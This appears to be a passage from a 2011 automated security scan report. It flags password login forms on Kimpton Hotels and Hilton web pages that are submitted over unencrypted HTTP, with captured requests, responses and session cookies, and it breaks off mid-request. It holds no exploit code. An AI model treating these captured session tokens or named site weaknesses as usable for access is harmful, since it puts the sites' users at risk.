<form name="inTouchSignInform" method="POST" action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">

   <ul class="links">
...[SNIP]...
</label>
           <input type="password" name="strPass" id="kitPw" size="20" />
       
           <input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" border="0" alt="Kimpton InTouch Sign In" />
...[SNIP]...
7.2. http://www.kimptonhotels.com/intouch/KIT_overview.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /intouch/KIT_overview.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /intouch/KIT_overview.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/search.aspx?q=xss&search.x=0&search.y=0&search=Search&output=xml_no_dtd&oe=UTF-8&ie=UTF-8&client=nonIFrame_frontend&site=default_collection&proxystylesheet=nonIFrame_frontend&filter=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635605933:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.2.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75799


<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Kimpton InTouch Guest Rewards and Loyalty Program</title>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
<!-- KIT SIGN-IN -->
<form name="inTouchSignInform" method="POST" action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">

   <ul class="links">
...[SNIP]...
</label>
           <input type="password" name="strPass" id="kitPw" size="20" />
       
           <input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" border="0" alt="Kimpton InTouch Sign In" />
...[SNIP]...
7.3. http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /restaurants/restaurant-reservations.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /restaurants/restaurant-reservations.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/intouch/KIT_overview.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635611005:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.3.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 144327


<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Gourmet Chef-Driven Restaurants in San Francisco and Major US Cities: Kimpton Hotels</title>
<meta http-equiv
...[SNIP]...
<!-- KIT SIGN-IN -->
<form name="inTouchSignInform" method="POST" action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">

   <ul class="links">
...[SNIP]...
</label>
           <input type="password" name="strPass" id="kitPw" size="20" />
       
           <input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" border="0" alt="Kimpton InTouch Sign In" />
...[SNIP]...
7.4. http://www.kimptonhotels.com/restaurants/restaurants.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /restaurants/restaurants.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /restaurants/restaurants.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/intouch/KIT_overview.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635611005:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.3.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171940


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head>
<title>Gourmet Chef
...[SNIP]...
<!-- KIT SIGN-IN -->
<form name="inTouchSignInform" method="POST" action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">

   <ul class="links">
...[SNIP]...
</label>
           <input type="password" name="strPass" id="kitPw" size="20" />
       
           <input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" border="0" alt="Kimpton InTouch Sign In" />
...[SNIP]...
7.5. http://www1.hilton.com/en_US/hi/customersupport/feedback.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/feedback.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/customersupport/feedback.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do;jsessionid=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; NSC_qse-qgt=44153d5f3660; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637043717:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:17:04 GMT
Content-Length: 36138
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:28:04 GMT;path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
7.6. http://www1.hilton.com/en_US/hi/customersupport/index.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/customersupport/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:00 GMT;path=/
Content-Length: 35005


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
7.7. http://www1.hilton.com/en_US/hi/customersupport/local-reservations.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/local-reservations.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/customersupport/local-reservations.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637060085:ss=1317635584777; NSC_qse-qgt=44153d5f3660

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:17:38 GMT
Content-Length: 76665
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:28:38 GMT;path=/


                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
7.8. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/site-usage.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/customersupport/site-usage.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmcore.tst=0.798; mmid=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; NSC_qse-qgt=44153d5f3660; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635903346:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 69511
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:07 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:09:07 GMT;path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
7.9. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:07 GMT;path=/
Content-Length: 55346


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
7.10. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:05 GMT;path=/
Content-Length: 49011


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
7.11. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:24 GMT;path=/
Content-Length: 65409


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
7.12. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:05 GMT;path=/
Content-Length: 84893


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
7.13. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:05 GMT;path=/
Content-Length: 47470


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
7.14. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:13 GMT;path=/
Content-Length: 45350


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
7.15. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149& HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; NSC_qse-qgt=44153d5f3660; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 12:53:40 GMT
Content-Length: 84951
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:04:40 GMT;path=/


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
7.16. http://www1.hilton.com/en_US/hi/index.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/index.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 57662
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:41 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
7.17. http://www1.hilton.com/en_US/hi/index.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/index.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
